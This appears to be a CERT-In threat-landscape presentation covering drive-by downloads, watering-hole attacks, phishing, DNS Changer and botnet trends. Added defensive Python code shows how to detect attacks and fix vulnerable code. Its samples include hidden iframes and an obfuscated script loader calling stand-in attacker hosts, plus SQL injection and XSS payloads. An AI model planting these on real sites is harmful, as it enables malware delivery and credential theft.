Cyber Security Threat Landscape

Bhupendra Singh Awasya, GCIH, GREM

Indian Computer Emergency Response Team (CERT-In)

Ministry of Communications and Information Technology, Department of Information Technology

Government of India

Topics of Discussion

• Cyber security incident trends
• Drive-by-download
• Watering hole attack
• Client side/targeted attacks/RATs
• Mobile malware threats
• DNS Changer malware
• Actions of Government
  – Cyber Security Policy
  – Crisis Management
• Cyber security best practices – expectations from organisations
• Current challenges and way forward

Threats

Any circumstance or event that has the potential to cause harm to a system or network. By this definition, even the existence of an (as yet unknown) vulnerability implies a threat. [CERT]

An event, the occurrence of which could have an undesirable impact on the well-being of an asset. [(ISC)2, International Information Systems Security Certification Consortium]

A threat can be:
• Intentional (i.e. intelligent; e.g. an individual cracker or a criminal organisation)
• Accidental (e.g. the possibility of a computer malfunctioning, or of an "act of God" such as an earthquake, a fire or a tornado)
• Circumstantial: unintentional, by chance

Understanding Threats

Threat agents
• Employees: malicious insiders, and the ignorant or careless
• Non-employees: outside attackers
• Natural disasters

Motives and impact
• Disruption of service
• Exposing sensitive information
• Altering, damaging or deleting information
• Pranks
• Publicity, peer recognition
• Monetary gain
• Revenge/defaming others
• Political ends
• Terrorism
• Curiosity, testing skills or systems

Methods
• Social engineering
• Viruses, Trojan horses, worms
• Key-loggers
• Exploitation of vulnerabilities
• Packet replay and packet modification
• IP spoofing
• Mail bombing
• Various hacking tools
• Password cracking
• Cross-site scripting
• SQL injection

Threat categories
• Transmission threats: eavesdropping/sniffing, DoS/DDoS, covert channels, spoofing, tunnelling, masquerading/man-in-the-middle attacks
• Malicious code threats: viruses, worms, Trojans, spyware/adware, logic bombs, backdoors, bots
• Password threats: password crackers
• Social engineering: dumpster diving, impersonation, shoulder surfing
• Physical threats: physical access, spying
• Application threats: buffer overflows, SQL injection, cross-site scripting
• Improper usage/unauthorised access: hackers (grey hats, white hats, black hats), internal intruders, defacement, open proxies used for spam, phishing
• Other threats: mobile code

Classification of Information Security Threats

National level
• Cyber terrorism
• Attacks on critical infrastructure
• Web defacement
• Website intrusion and malware propagation
• Malicious code
• Scanning and probing
• Denial of Service and Distributed Denial of Service
• Cyber espionage

Organisational level
• Website intrusion/defacement
• Domain stalking
• Malicious code
• Scanning and probing
• Denial of Service and Distributed Denial of Service
• Targeted attacks
• Phishing
• Data theft
• Insider threats
• Financial frauds

Individual level
• Social engineering
• Email hacking and misuse
• Identity theft and phishing
• Financial scams
• Abuse through emails
• Abuse through social networking sites
• Laptop theft

Cyber threats

A few years ago (2006 and earlier), "no one ever thought of spreading malware via legitimate websites." Today compromised legitimate sites are one of the main delivery channels.

Drive-by-download

• Downloads which a person authorised but without understanding the consequences (e.g. downloads which install an unknown or counterfeit executable program, ActiveX component or Java applet).
• Any download that happens without a person's knowledge.
• Download of spyware, a computer virus or any other kind of malware that happens without a person's knowledge.

Unintended download of software from the Internet (the flow of the attack, from the slide's diagram):

1.1 The attacker creates a malicious website.
1.2 The attacker infects a legitimate website (injecting a reference to the malicious site).
2. The user requests the legitimate website.
3. The website's response includes the injected malicious code.
4. The user's browser, following that code, requests content from the malicious website.
5. The malicious website delivers the malware/virus to the legitimate user's system.

Malware authors are shifting their focus from traditional desktop-based attack methods to dynamic, user-interactive web applications as the channel for spreading malware.

Watering Hole Attack

A "watering hole" is an attack strategy identified in 2012 by RSA. The attacker injects malicious code into the public web pages of a site that the intended targets are known to visit. The aim is to compromise a particular group (an organisation, industry or region). The attack has three phases:

– Guess (or observe) which websites the group often uses.
– Infect one or more of these websites with malware.
– Eventually, some member of the targeted group gets infected.

The campaign in which the technique was first identified exploited an Internet Explorer zero-day vulnerability.

Why attackers are using this

In this attack vector, attackers compromise a legitimate website and plant a piece of malicious code in it, which is then served to every legitimate user of that website.

How do they do it?

• Web defacement
  – Exploitation of application vulnerabilities (Joomla, PHP, ASP, JSP, cPanel vulnerabilities, etc.)
  – SQL injection
  – RFI/LFI
  – Theft of (admin) credentials
  – Web shells

• Website intrusion and malware propagation
  – SQL injection (automated)
  – Asprox botnet
  – Gumblar (stolen FTP credentials)
  – Toolkits: MPack, Neosploit, Luckysploit, Phoenix, CrimePack, etc.

Once the malware is planted on the user's computer, a remote attacker can:
- Access the infected computer
- Steal user credentials, banking or other passwords
- Use it as a launching pad for further attacks
- Install more sophisticated malware
- Chain access into corporate networks (e.g. via the VPN the user or the user's system is allowed to use)

A typical injected element is a zero-size or hidden iframe pointing at the attacker's host, e.g.:

<iframe src="http://malicious.domain/" width="0" height="0"></iframe>

or, equivalently:

<iframe src="http://malicious.domain/" style="visibility:hidden;position:absolute"></iframe>

Stolen admin credentials

Another popular vector, besides SQL injection and cross-site scripting, is stealing FTP service credentials. Many websites have their content managed through FTP uploads, so a stolen FTP password gives the attacker write access to the site's pages.

Gumblar performs the following tasks:
- Stealing FTP credentials
- Sending spam
- Installing fake anti-malware
- Google search/query hijacking
- Disabling security software such as the desktop firewall and antivirus

Attackers can also:
- Use URL-shortening services such as http://tinyurl.com/ and http://bit.ly/ to hide the actual URL
- Upload documents with malicious code embedded (PDF, DOC, XLS, SWF, PPT)
- Place iframes or JavaScript in comment fields
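The injection artefacts described in this section (a zero-size or hidden iframe, a script pulled from a foreign domain, HTML smuggled in through a comment field, an obfuscated inline script that writes a script tag) can be picked out of a saved page with a small scanner. The following is an added example, not code from the presentation or from CERT-In; it uses only the Python standard library, the host name news.example and the sample page are constructed for the example, and the heuristics are deliberately simple (a production check would also resolve relative URLs and allow-list known CDNs).

```python
"""Scan saved HTML for the injection patterns that drive-by-download and
watering-hole compromises leave behind.  Added example; the sample page
and the host name news.example are constructed, not captured."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Inline-script constructs commonly used to hide an injected <script> tag.
OBFUSCATION = re.compile(r"\b(unescape|eval|String\.fromCharCode)\s*\(")


class InjectionScanner(HTMLParser):
    """Collects (finding_type, detail) tuples while parsing."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []
        self.in_script = False

    def _foreign(self, url):
        host = urlparse(url or "").hostname
        return bool(host) and host.lower() != self.page_host

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "iframe":
            style = a.get("style", "").replace(" ", "").lower()
            hidden = (
                a.get("width", "").rstrip("px") == "0"
                or a.get("height", "").rstrip("px") == "0"
                or "visibility:hidden" in style
                or "display:none" in style
            )
            if hidden or self._foreign(a.get("src")):
                self.findings.append(("hidden-or-external-iframe", a.get("src", "")))
        elif tag == "script":
            self.in_script = True
            if self._foreign(a.get("src")):
                self.findings.append(("external-script", a["src"]))

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        # Script bodies arrive here as one chunk; look for obfuscation calls.
        if self.in_script and OBFUSCATION.search(data):
            self.findings.append(("obfuscated-inline-script", data.strip()[:60]))


def scan(html_text, page_host):
    """Return the list of suspicious findings for one page."""
    scanner = InjectionScanner(page_host)
    scanner.feed(html_text)
    scanner.close()
    return scanner.findings


# Constructed sample: a legitimate page carrying three injected artefacts.
SAMPLE_PAGE = """<html><body>
<h1>Daily News</h1>
<script src="/js/site.js"></script>
<iframe src="http://malicious.domain/" width=0 height=0></iframe>
<div class="comment">Great article!
  <iframe src="http://evil.example/x" style="visibility:hidden;position:absolute"></iframe>
</div>
<script>document.write(unescape('%3Cscript src=%22http://bad.example/a.js%22%3E%3C/script%3E'))</script>
</body></html>"""

if __name__ == "__main__":
    for kind, detail in scan(SAMPLE_PAGE, "news.example"):
        print(f"{kind:28s} {detail}")
```

Run it against a page fetched with the site's own hostname as page_host; a same-origin, visible iframe produces no finding, which is the point of comparing the iframe's host with the page's.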

Social engineering

"Social engineering is the act of manipulating people into performing actions or divulging confidential information." How does an unwitting user get drawn in?

• Intentions:
  – Phishing/financial frauds
  – Malware propagation
  – Nigerian (419) scams

Social engineering scams

– Advance fee fraud / Nigerian (419) scams
  • The term "419" refers to the article of the Nigerian Criminal Code ("Obtaining Property by false pretences; Cheating") that deals with fraud
  • Variants:
    – Purchasing goods and services
    – Cheque cashing
    – Lottery scam
    – Fake job offer
    – Beneficiary of a will
    – Charity scams
    – Friend/lost wallet scam
    – Fraud recovery scams
    – and many more

Phishing

• The term "phishing" is a play on "fishing" (password + fishing = phishing): the attacker casts bait and waits for a credential to bite.

"Phishing is the act of sending a communication (email/message/fax/SMS) to a user, falsely claiming to be a legitimate enterprise or brand, in an attempt to scam the unsuspecting user into disclosing sensitive private information that will be used for identity theft."

Phishing in the name of a tax refund (screenshot)

Phishing in the name of the RBI (screenshot)

Spear phishing

Attack on client-side software
• PDF reader/Flash
• Microsoft Office applications
• Normally delivered via an interesting and relevant email, often in the local language, with a Microsoft Office or PDF attachment; the document can also be hosted on a website and the victim lured into opening it.
• Designed to target a specific individual or organisation
• Aim is to extract sensitive/valuable information

Recently seen

Attack toolkits – vulnerabilities exploited (chart)

Source: Exploit kits overview - Kaspersky Labs

Targeted attacks - example

From: Sr Manager [mailto:[email protected]]
Sent: Tuesday, 19 January, 2010 5:14 PM
To: [email protected]
bcc: [email protected], [email protected]
Subject: Urgent document for agenda items for the coming meeting

Dear Mr. (Target)

I am attaching the agenda items for a probable meeting for discussing briefing points for the board meeting. For confidentiality reasons the attached file is password protected; the password for the attached file is "abc123". Please have a look and send your comments and input material to me ASAP.

Regards
Ram Mathur
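The sample mail above carries several indicators a mail gateway or analyst can score mechanically: an internal-sounding role in the display name on an outside mailbox, urgency in the subject, a risky attachment type, and a password-protected attachment whose password is in the same message (which defeats gateway scanning while costing the victim nothing). The following triage routine is an added example, not code from the presentation or from CERT-In; it uses only the Python standard library, and the message it builds, the addresses and the domains (corp.example, freemail.example) are constructed rather than a real capture.

```python
"""Triage a suspected targeted-attack email for the indicators shown in the
sample above.  Added example using only the Python standard library; the
message, addresses and domains are constructed, not a real capture."""
import re
from email import message_from_bytes, policy
from email.message import EmailMessage
from email.utils import parseaddr

URGENCY = re.compile(r"\b(urgent|asap|immediately|within 24 hours)\b", re.I)
ROLE_NAME = re.compile(r"\b(manager|director|ceo|cfo|admin|helpdesk)\b", re.I)
PASSWORD_IN_BODY = re.compile(r"password\s+(?:for|is|of|:)", re.I)
RISKY_EXT = (".zip", ".rar", ".7z", ".doc", ".docx", ".xls", ".xlsx",
             ".ppt", ".pptx", ".pdf", ".exe", ".scr", ".js", ".swf")


def triage(raw, org_domain):
    """Return the list of indicators found in one RFC 5322 message."""
    msg = message_from_bytes(raw, policy=policy.default)
    indicators = []

    display, sender = parseaddr(str(msg.get("From", "")))
    external = bool(sender) and not sender.lower().endswith("@" + org_domain.lower())
    if external:
        indicators.append("external-sender")
        if ROLE_NAME.search(display):
            # An internal-sounding role name on an outside mailbox.
            indicators.append("role-name-from-external-domain")

    reply_to = parseaddr(str(msg.get("Reply-To", "")))[1]
    if reply_to and reply_to.lower() != sender.lower():
        indicators.append("reply-to-mismatch")

    if URGENCY.search(str(msg.get("Subject", ""))):
        indicators.append("urgency-in-subject")

    body_part = msg.get_body(preferencelist=("plain", "html"))
    body = body_part.get_content() if body_part else ""
    attachments = [p.get_filename() or "" for p in msg.iter_attachments()]

    if attachments and PASSWORD_IN_BODY.search(body):
        # Password-protected attachment with the password in the same mail.
        indicators.append("password-for-attachment-in-body")
    if any(name.lower().endswith(RISKY_EXT) for name in attachments):
        indicators.append("risky-attachment-type")
    return indicators


def build_sample():
    """Constructed message modelled on the slide's example (not the original)."""
    msg = EmailMessage()
    msg["From"] = "Sr Manager <sr.manager@freemail.example>"
    msg["To"] = "target@corp.example"
    msg["Subject"] = "Urgent document for agenda items for the coming meeting"
    msg.set_content(
        "Dear Mr. Target\n\nI am attaching the agenda items for the board meeting. "
        "For confidentiality reasons the attached file is password protected; "
        "the password for the attached file is: abc123. Please send your comments ASAP.\n\n"
        "Regards\nRam Mathur\n")
    # Placeholder bytes standing in for the archive; not a real ZIP file.
    msg.add_attachment(b"PK\x03\x04 constructed placeholder, not a real archive",
                       maintype="application", subtype="zip", filename="agenda.zip")
    return msg.as_bytes()


if __name__ == "__main__":
    for ind in triage(build_sample(), "corp.example"):
        print("[!]", ind)
```

Each indicator on its own is weak (managers do send urgent mail); the value is in the combination, so feed the list into a score or a rule such as "password-in-body plus risky attachment from an external sender goes to quarantine".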

BlackHat SEO / SEO poisoning

BlackHat SEO is a maliciously motivated search engine optimisation technique that abuses search engine ranking to push malicious websites to the top of search results.

• How is a search poisoned? Typically the attacker uploads PHP scripts to compromised sites. The scripts query Google's trending-topics service and generate HTML relevant to the hottest search terms, so the compromised pages rank for those terms and draw visitors to the malicious content.
  – Campaigns seen around: holidays, sales events, natural disasters, much-anticipated product announcements, sporting events, celebrity gossip, TV shows and popular toys.

Recent trends show Google Image indexes are also being poisoned.

SEO poisoning (screenshot)

Rogue Antivirus - Scareware

Rogue antivirus "AVG -Antivirus 2011" shortcut icon (screenshot)

Rogue antivirus for Mac OS X
• MAC Defender
  – http://www.cert-in.org.in/s2cMainServlet?pageid=PUBVA01&VACODE=CIVA-2011-1185

Most popular technique for identity theft seen:

The message offers a "spectacular video" or claims "you appear in this clip". The bait normally comes from the profile of a friend whose account has already been hacked.

Users typically receive a message (which appears to be genuine) suggesting that the recipient click a link for one reason or another. In most cases the message offers a "spectacular video", claims "you appear in this clip", or uses a similarly catchy theme, and normally includes the recipient's user name so the lure looks personal.

Slides (screenshots):
• Malware through Facebook
• Links to malicious sites
• Geo-aware attack toolkit: malware delivered only to a few countries
• Facebook likejacking

How they can change the world: the "DNS Changer" malware (Operation Ghost Click)

• About 4 million computers infected.
• Exploited default usernames and passwords on DSL routers, and also spread through other malware such as Koobface.
• The malware hijacks the domain name system (DNS) settings of infected systems, pointing them at resolvers the attackers control.
• The FBI shut the operation down and stood up temporary replacement DNS servers to give people time to fix the problem while still being able to use their computers.
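Because DNS Changer worked by rewriting resolver settings (on the host or on a router with default credentials), the clean-up check is to compare the resolvers a machine is actually using against the rogue ranges and against the resolvers the organisation approves. The following is an added example, not code from the presentation or from CERT-In; the resolv.conf text and the approved list are constructed, and the rogue ranges reproduce those in the FBI's public DNSChanger notice and should be confirmed against that notice before being relied on in an investigation.

```python
"""Classify a host's configured DNS resolvers the way a DNSChanger clean-up
does: an address inside the rogue ranges is a compromise indicator, and an
address outside the organisation's approved resolvers needs explaining.
Added example; the resolv.conf text and the approved list are constructed."""
import ipaddress
import re

# Rogue resolver ranges as published in the FBI's DNSChanger notice; confirm
# against the notice before relying on them.
ROGUE_RANGES = [ipaddress.ip_network(n) for n in (
    "85.255.112.0/20", "67.210.0.0/20", "93.188.160.0/21",
    "77.67.83.0/24", "213.109.64.0/20", "64.28.176.0/20",
)]


def resolvers_from_resolv_conf(text):
    """Extract nameserver addresses from /etc/resolv.conf-style text."""
    found = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()          # drop comments
        m = re.match(r"nameserver\s+(\S+)", line)
        if m:
            try:
                found.append(ipaddress.ip_address(m.group(1)))
            except ValueError:
                pass                                    # malformed entry, ignore
    return found


def classify_resolvers(resolvers, approved_networks):
    """Return (address, verdict) pairs: ROGUE, approved or unexpected."""
    approved = [ipaddress.ip_network(n) for n in approved_networks]
    verdicts = []
    for ip in resolvers:
        if any(ip in net for net in ROGUE_RANGES):
            verdicts.append((str(ip), "ROGUE"))
        elif any(ip in net for net in approved):
            verdicts.append((str(ip), "approved"))
        else:
            verdicts.append((str(ip), "unexpected"))
    return verdicts


# Constructed resolv.conf from a host whose router-supplied DNS was changed.
SAMPLE_RESOLV_CONF = """# Generated by DHCP from the home router
search corp.example
nameserver 85.255.113.5
nameserver 10.0.0.53
nameserver 8.8.8.8
nameserver not-an-address
"""

if __name__ == "__main__":
    found = resolvers_from_resolv_conf(SAMPLE_RESOLV_CONF)
    for addr, verdict in classify_resolvers(found, ["10.0.0.0/8"]):
        print(f"{addr:18s} {verdict}")
```

On a Windows host the same check applies to the DNS servers listed by "ipconfig /all"; and since the malware also changed the resolver on the router, the router's own WAN DNS settings need the same comparison, not just the host's.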

Mobile Threats

• The mobile counterparts of the desktop banking Trojans: Zitmo (Zeus In The Mobile), Spitmo (SpyEye In The Mobile), Carberp
• Present across almost all the major platforms (Android, Symbian, BlackBerry)

Quick Response Code (QR Code)

"Use your tablet or phone camera to scan this image to visit our website!"
• Visit our website @ (QR code image)

What if the QR code was set up by an attacker, for instance with the Social-Engineer Toolkit (SET), to launch an attack? The user cannot see where the code points before scanning it.

Web-Application Attacks

• Low-hanging fruit – in-house developed sites ("Develop your website for just Rs. 500/-")
• "75% of all attacks occur at the application layer" – Gartner
• "8 out of 10 websites are vulnerable to attack" – WhiteHat Security
• Web apps account for 80 percent of Internet vulnerabilities

Attacks
• Cross-Site Scripting (XSS)
• SQL Injection
• Cross-Site Request Forgery (XSRF/CSRF)
• Malicious file upload
• Remote File Inclusion (RFI)
• Command injection
• ... and more
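Two of the attacks in the list above, SQL injection and cross-site scripting, come down to the same mistake: user input concatenated into a string that something else (the database, the browser) then parses. The following is an added example, not code from the presentation or from CERT-In: an in-memory SQLite login check written with string formatting beside the parameterised version, and a comment renderer with and without output encoding. The table, the user "alice" and the payloads are constructed.

```python
"""SQL injection and stored XSS side by side with their fixes.  Added
example; the table, the user and the payloads are constructed."""
import html
import sqlite3


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    con.commit()
    return con


def login_vulnerable(con, username, password):
    # Attacker-controlled strings become part of the SQL text itself.
    query = ("SELECT 1 FROM users WHERE username = '%s' AND password = '%s'"
             % (username, password))
    return con.execute(query).fetchone() is not None


def login_safe(con, username, password):
    # Placeholders keep the input as data; the driver never re-parses it as SQL.
    query = "SELECT 1 FROM users WHERE username = ? AND password = ?"
    return con.execute(query, (username, password)).fetchone() is not None


def render_comment_vulnerable(text):
    # Raw user text interpolated straight into the page: stored XSS.
    return "<p>%s</p>" % text


def render_comment_safe(text):
    # Encode the HTML-significant characters before interpolating.
    return "<p>%s</p>" % html.escape(text, quote=True)


if __name__ == "__main__":
    con = make_db()
    attempts = [("alice", "s3cret"), ("alice", "' OR '1'='1"), ("alice'--", "wrong")]
    for user, pw in attempts:
        print(f"{user!r:12} {pw!r:14} vulnerable={login_vulnerable(con, user, pw)} "
              f"safe={login_safe(con, user, pw)}")
    print(render_comment_vulnerable("<script>alert(1)</script>"))
    print(render_comment_safe("<script>alert(1)</script>"))
```

The second attempt turns the WHERE clause into "username = 'alice' AND password = '' OR '1'='1'", which is always true; the third comments out the password check entirely with "--". The parameterised query rejects both because the quote and the comment marker are never interpreted as SQL.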

Threat Trends

Year   Rank
2013   2
2012   4
2011   10

Threat Landscape

Botnet trends - India (chart): monthly count of infected systems from Jan 2008 to Dec 2010, y-axis 0 to 2,500,000; individual monthly values range from about 1,279 to 2,116,482. Labelled series: Conficker, Mariposa.

Botnet trends – 2012-13

Infected-system counts by botnet, reconstructed from the chart (values paired with labels in the order they were extracted):

torpig               883025
dnschanger           583138
mebroot              508125
Ponmocup             178710
Gozi                  89319
spam                  77778
ZeuS                  72152
TDSS                  51815
Artro                 35078
SpyEye                32691
irc                   22969
DDoS.DirtJumper       18062
Carberp               16316
Gbot                  11200
honeypot              10479
Oficla                 9884
pushdo                 7667
Ramnit                 7529
DDoS_DirtJumper        4363
DDoS.Armageddon        3973

Botnet trends (Top 20 Infection) India (2011)

Infected-system counts by botnet, reconstructed from the chart (values paired with labels in the order they were extracted):

ZeroAccess          1552529
pushdo                63041
Sality_Virus          62872
zeus                  62653
spam                  43881
Pushdo_Spambot        10116
GameOver_Zeus          5041
zeus-p2p               4781
Beebone                3841
grum                   3688
torpig                 3096
slenfbot.5050          3054
Neurevt                2725
DDoS_DirtJumper        2514
Virut_botnet           2293
Pony                   1446
blackenergy            1368
Ransomware             1303
Dofoil                 1281
TDSS                   1185
KeySpy                 1062

Botnet trends – October 2013

Timeline of computer malware

Attack toolkits
• Web Attacker
• MPack, Fragus
• Neosploit, Luckysploit, IcePack
• Blackhole, Eleonore
• Zeus
  – Stores its data under random registry keys (RC4-encrypted); a victim is often compromised several times by different attackers using the same kit, which makes clean-up difficult
• Mariposa – steals data from HTTP POST requests, with blended defence mechanisms
• SpyEye – competes with Zeus

Attack toolkit - MPack (screenshot)

6 levels of simultaneous action
• Government – policy, plan, IT Act, directives, CMP
• Public-private partnership – Joint Working Group
• Technical – honeypots, sensors, situational awareness, R&D
• CIIP and CERT – Sections 70A and 70B of the IT Act
• Individual/professional – awareness and capacity building
• International – information sharing and cooperation

Security of Cyber Space – snapshot of efforts: 8 frameworks for focused action

• Enabling legal framework
• Cyber security assurance framework (product, process, technology and people)
• Alert and advisory framework – network of the national CERT and sectoral CERTs
• Capacity building framework – training and awareness, skilled manpower
• Critical Information Infrastructure Protection (CIIP)
• Cyber security research and development
• Information sharing and cooperation framework – national and international
• Public-private partnership (JWG)

Actions at organisational level
• Security policies and procedures
• Defined roles: CSIRT/CISO/administrators/users
• Multi-layered defence mechanism
  – Network behaviour analysis
  – Perimeter defence
  – Security Information and Event Management
  – Database Activity Monitoring
• Updated/patched applications
• Host-based Intrusion Prevention System
• Content inspection systems/DPI at the perimeter, DLP
• Pre-defined procedures for information sharing
• Authentication and authorisation to secure information and prevent data leakage
• Authentication of emails (digital signatures)
• Auditing and pentesting
• User awareness

Way forward
• Fostering collaboration between Government and industry
• Implementation of security best practices based on global standards
• Use of validated and certified IT products and devices
  – India is an Authorizing Nation under the Common Criteria Recognition Arrangement (CCRA)
• Creation of mechanisms for auditing Industrial Control Systems and associated IT systems, and empanelment of ICS auditors
• Secure application/software development process
• Trusted exchange of information on vulnerabilities and threats
• Creation of incident response teams at entity level
• Capacity building
• Mock drills for improving the security posture of CII, including simulated attacks on ICS devices

Thank you

Incident Response Helpdesk

Phone: 1800 11 4949

FAX: 1800 11 6969

e-mail: [email protected]

http://www.cert-in.org.in